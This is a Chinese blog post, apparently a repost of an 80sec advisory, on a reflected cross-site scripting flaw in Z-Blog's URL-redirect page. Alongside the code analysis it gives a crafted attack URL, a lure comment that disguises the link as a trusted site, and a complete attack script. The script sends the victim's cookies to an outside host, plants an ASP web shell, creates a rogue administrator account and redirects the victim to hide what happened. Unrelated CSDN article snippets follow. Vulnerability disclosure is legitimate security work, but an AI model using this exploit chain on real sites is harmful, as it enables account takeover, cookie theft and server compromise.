Z-blog跨站脚本攻击漏洞

最新推荐文章于 2024-01-17 14:20:46 发布
最新推荐文章于 2024-01-17 14:20:46 发布
阅读量864 收藏
点赞数
文章标签: 脚本 xmlhttprequest url function action shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hackiis/article/details/2914140
版权
 漏洞厂商:http://www.rainbowsoft.org/

漏洞解析:在FUNCTION/c_urlredirect.asp中,程序对提交的url参数做如下处理

strUrl=URLDecodeForAntiSpam(Request.QueryString("url"))

其中URLDecodeForAntiSpam是防止垃圾连接的解码函数,其函数处理如下

Function URLDecodeForAntiSpam(strUrl)

Dim i,s
For i =1 To Len(strUrl) Step 2
s=s & Mid(strUrl,i,1)
Next
URLDecodeForAntiSpam=s

End Function

在做如上处理之后程序将在c_urlredirect.asp输出url参数

...
<meta http-equiv="refresh" content="0;URL=<%Response.Write strUrl%>“/>

精心构造url参数将能构造一个url类型的非持久xss如下:

http://127.0.0.1/Z-Blog18/FUNCTION/c_urlredirect.asp?url=jxaxvxaxsxcxrxixpxtx%3Ax%22x%3Ex%3Cxsxcxrxixpxtx+xsxrxcx%3Dxhxtxtxpx%3Ax%2Fx%2Fx1×2×7x%2Ex0x%2Ex0x%2Ex1x%2Fx1x%2Exjxsx%3Ex%3Cx%2Fxsxcxrxixpxtx%3Ex

上述url访问之后将引入127.0.0.1/1.js执行,其中可以写任意js代码。

而z-blog的所有安全设计全部用来抵御前台的攻击,对于后台基本没有任何限制,加上antispam功能对用户提交的url连接类似于加密处理,所以很容易就可以诱惑别人访问上述的xss攻击url,可以发表评论如下:

看这个站,有新东西?
[URL=http://www.foo.com/function/c_urlredirect.asp?url=jxaxvxaxsxcxrxixpxtx%3Ax%22x%3Ex%3Cxsxcxrxixpxtx+xsxrxcx%3Dxhxtxtxpx%3Ax%2Fx%2Fx1x2x7x%2Ex0x%2Ex0x%2Ex1x%2Fx1x%2Exjxsx%3Ex%3Cx%2Fxsxcxrxixpxtx%3Ex]http://www.80sec.com[/URL]
用户看到的是http://www.80sec.com这个信任的站点,而一旦点击将在www.foo.com域执行恶意用户指定的js,在该js里可以 写shell,添加用户,偷取COOKIE然后模拟出真正的转向,整个过程很难发现攻击的意图,80sec提供js如下:

xmlhttp=poster();
cookie=document.cookie;
login=cookie.indexOf('password')==-1?0:1;
tolocation='http://www.80sec.com/';

//get cookie
x=new Image();
x.src="http://www.80sec.com/c.php?c="+escape(document.cookie);

//get a shell
data="txaContent=<%25execute(request(%22a%22))%25>“;
postmydata(”http://www.0×37.com/cmd.asp?act=SiteFilePst&path=%2E%2FUPLOAD%2Findex%2Easp&opath=”,data);

//add a user data=”edtID=0&edtLevel=2&edtName=xss2root&edtPassWord=d073d5454ffe92bdcd3cbcb77d149df5&edtPassWordRe=xss2root&edtEmail=null@null.com&edtHomePage=&edtAlias=”;
postmydata(”http://www.0×37.com/cmd.asp?act=UserCrt”,data);

//fool the user
window.location=tolocation;

function poster(){
var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType(’text/xml’);
}
} else if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i
try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
}
return request;
}

function postmydata(action,data){
xmlhttp.open(”POST”, action, false);
xmlhttp.setRequestHeader(’Content-Type’, ‘application/x-www-form-urlencoded’);
xmlhttp.send(data);
return xmlhttp.responseText;
}
hackiis
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞案例之z-blog后台文件上传
初岄的博客
03-15 2974
漏洞案例之z-blog后台文件上传
Z-BlogPHP 服务器请求伪造漏洞 (CVE-2022-40357)
weixin_68999845的博客
07-31 1583
Z-BlogPHP 1.7.2及之前版本存在安全漏洞,该漏洞源于zb_users/plugin/UEditor/php/action_crawler.php文件中的服务器端请求伪造(SSRF)漏洞允许远程攻击者通过将任意URL注入源参数来强制应用程序发出任意请求。1.按照源码地址下载,以下为源码下载地址连接:https://github.com/zblogcn/zblogphp/archive/refs/tags/v1.7.1-2960.zip。·漏洞名称:Z-BlogPHP 服务器请求伪造漏洞
z-blog漏洞php,Z-blog跨站脚本攻击漏洞
weixin_30959465的博客
03-10 2184
漏洞说明:Z-Blog是一款基于Asp平台的Blog博客(网志)程序,支持Wap,支持Firefox,Oprea等浏览器,在国内使用非常广泛,官方主页在http://www.rainbowsoft.org/。Z-blog代码严谨,前台功能简洁,后台功能强大,这为它的产品安全带来很大的优势,但是80sec在产品中发现一个严重的跨站脚本攻击漏洞,加上产品设计上的一些问题可能带来严重的后果。漏洞厂商:h...
xss跨站脚本攻击汇总
07-24
xss 跨站脚本攻击是一种常见的 web 应用程序漏洞,攻击者可以inject 恶意脚本到网页中,从而获取用户的敏感信息或控制用户的浏览器行为。下面是 xss 跨站脚本攻击的一些常见类型: 1. 普通的 XSS JavaScript 注入:...
Netsparker.7z 绿色安装包 与其他安全扫描工具相比更好检测SQL注入和跨站脚本攻击类型的安全漏洞
05-30
其次,跨站脚本攻击(XSS)通常涉及将恶意脚本注入到网页中,当用户访问时,脚本会在用户的浏览器上执行。这可能导致钓鱼、会话劫持或者信息盗窃。Netsparker对此类攻击的检测也非常到位,它可以识别并防止不安全的...
基于PHP的Z-Blog PHP博客程序.zip
07-24
Z-Blog PHP是一款基于PHP语言开发的开源博客系统,它为个人或团队提供了一个功能强大、易于使用的在线出版平台。这个压缩包“基于PHP的Z-Blog PHP博客程序.zip”包含了一个完整的Z-Blog PHP安装包,允许用户快速搭建...
E073-PHP应用安全-针对客户端脚本注入漏洞的安全开发.pdf
12-02
【PHP应用安全】客户端脚本注入漏洞是Web应用程序常见的安全问题之一,主要发生在用户可以通过输入字段传递可执行脚本到服务器端,导致恶意脚本在客户端执行,影响用户体验,甚至可能导致敏感信息泄露或被篡改。...
Z-Blog v1.8 Walle Build 100427 (自动安装包)-ASP源码.zip
01-26
作为一款成熟的博客系统,Z-Blog v1.8 Walle Build 100427 在安全性方面做了不少工作,包括对输入数据的过滤、防止SQL注入、XSS攻击等。同时,定期的更新和补丁修复了已知的安全漏洞,确保用户的博客安全。 **7. ...
Z-blog csrf漏洞学习
m0_62970186的博客
04-03 2595
文章目录Z-blog csrf环境搭建数据包构造漏洞利用抓包绕过放包结果简单代码分析实战利用思路: Z-blog csrf 环境搭建 1. 首先我在本地搭了一个z-blog。 ​ 思路:csrf并不侧重于哪种功能点,只要检测不规范,就可能利用成功,所以我考虑了一下后台添加管理员的地方。 数据包构造 我用了csrftext这款工具,抓包构造了一个跨站数据包。 3. 获得的数据包如下 可以发现是我提交的数据。 漏洞利用 将数据包放在了我的vps上。 ) 5. 新建页面访问跨站ur
z-blog漏洞php,zblog1.51 php版GetShell漏洞
weixin_42501161的博客
03-10 2814
GetShell漏洞的分析相关环境源码信息:zblog 1.51问题文件:\zb_users\plugin\AppCentre\plugin_edit.php漏洞类型:文件写入导致代码执行站点地址:https://www.zblogcn.com/在文件\zb_users\plugin\AppCentre\plugin_edit.php的第47行-68行中发现如下代码块,仔细分析该代码块可以知道,两...
z-blog+php+漏洞,Z-Blog的PHP版前台存储型XSS漏洞
weixin_29432775的博客
03-19 613
### 简要描述:看到你们内测的消息我就屁颠屁颠地跑过来了,花了两个通宵看代码发现几处漏洞..这里先绕过了你们XSS过滤脚本..### 详细说明:问题出在/zb_system/function/c_system_common.php```function TransferHTML($source,$para){if(strpos($para, '[nohtml]')!==false){$sourc...
z-blog+php+漏洞,bo-blog index.php include任意php文件漏洞
weixin_27034523的博客
03-19 299
来源:[F.S.T]火狐技术联盟文章作者:我非我[F.S.T]漏洞发现日期:2005.6.13漏洞涉及版本:Bo-Blog Version <= 1.7.0108(未打补丁前)漏洞分析及利用:刚发现bo-blog的一个致命的漏洞。我是看1.7.0095版本的。不过估计最新的也有这个漏洞.在index.php中的job变量没有过滤.导致用户可以任意include一个php文件.index.ph...
Z-BlogPHP 1.5.2 Zero后台存在文件上传漏洞复现( CNVD-2019-12772)
千寻的博客
05-07 3841
文章目录0x01 简介0x02 漏洞概述0x03 影响版本0x04 漏洞编号0x05 漏洞分析第一步 获取数据包,查看文件上传功能接口第二步 查看该文件源码第三步全局搜索该函数,查看UnPack函数第四步 首先对app.php中的源码进行分析第五步 接着向下,继续分析,第六步 则根据最后一步骤,可生成开始时的exp,0x06 环境搭建第一步 使用phpstudy搭建网站第二步 解开源码压缩包第三步 打开浏览器第四步 默认下一步,直到数据库配置第五步 创建数据库第六步 输入相关信息点击下一步第七步 跳转至首
php 跨站脚本攻击漏洞,Z-Blog最新PHP跨站脚本攻击漏洞 | CN-SEC 中文网
weixin_36410277的博客
03-10 432
摘要cmd.php有XSS通过 zc_blog_subname 参数 或 zc_upload_filetype 参数ZC_BLOG_SUBNAME 参数:cve-2018-7736 XSS漏洞cmd.php有XSS通过zc_blog_subname参数 或zc_upload_filetype参数ZC_BLOG_SUBNAME 参数:http://localhost/z-blog/zb_sys...
【靶机渗透BLOGGER: 1
weixin_47443077的博客
06-16 938
【靶机渗透BLOGGER: 1 0x01靶机介绍 1.详情 链接: https://www.vulnhub.com/entry/blogger-1,675/ 2.描述 James M Brunner, A Web Developer has recently created a blog website. He hired you to test the Security of his Blog Website. Hack Your Way In Mr. Robot Style ???? 一位Web 开发
如何排查自己的服务器是否受到了入侵
weixin_52501704的博客
12-23 575
怎么排查自己的服务器是否被人进行入侵
如何判断网站是否被黑客入侵?
最新发布
Spontaneous_0的博客
01-17 990
在传统的思维中,黑客入侵仿佛只会发生在规模较大企业中。但如今缺乏完备的安全防护以及安全意识的中小型企业也已然成为黑客乐于攻击的目标。随着网络攻击的频次增加,网络安全逐步成为企业内部的重要话题。然而很多时候技术人员经常在发现问题时候已经为时已晚。今天我们汇总了以下案例,看看你的网站是否被黑客入侵。当公司网站或正在使用的浏览器显示可疑活动的信号或出现警告屏幕,表明当前可能存在网络钓鱼攻击。网络钓鱼攻击是一种社会工程骗局,其中黑客通过广告、文本或电子邮件冒充合法的公司或企业。
xss 跨站脚本攻击漏洞
08-29
跨站脚本攻击(Cross-Site Scripting,XSS)是一种常见的网络安全漏洞,攻击者利用这个漏洞向网站中注入恶意代码,并在用户浏览器上执行。这种攻击通常发生在存在输入输出的网页应用程序中。 XSS攻击主要分为三种类型: 1. 存储型XSS:攻击者将恶意代码存储在目标网站的数据库中,当其他用户访问该网站时,恶意代码被返回并在用户浏览器中执行。 2. 反射型XSS:攻击者构造一个包含恶意代码的URL,并将其发送给目标用户。用户点击链接后,恶意代码从URL中获取并在用户浏览器上执行。 3. DOM-based XSS:攻击者通过修改网页的DOM结构来执行恶意代码,不需要向服务器发送请求。这种类型的XSS攻击主要基于客户端脚本和DOM文档对象模型。 为了防止XSS攻击,开发人员可以采取以下几种措施: 1. 输入验证和过滤:对用户输入的数据进行验证和过滤,确保不允许包含恶意代码。 2. 输出编码:在将数据输出到网页上时,使用适当的编码方式(如HTML实体编码或JavaScript转义)来防止恶意代码的执行。 3. 使用安全的API:避免使用不安全的API,特别是将用户输入作为参数的API。例如,使用textContent替代innerHTML可以防止XSS攻击。 4. 设置HTTP头部:通过设置X-XSS-Protection和Content-Security-Policy头部,可以进一步加强网站的安全性。 请注意,这只是一些常见的防御措施,具体的应对措施还需要根据实际情况和开发框架来确定。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值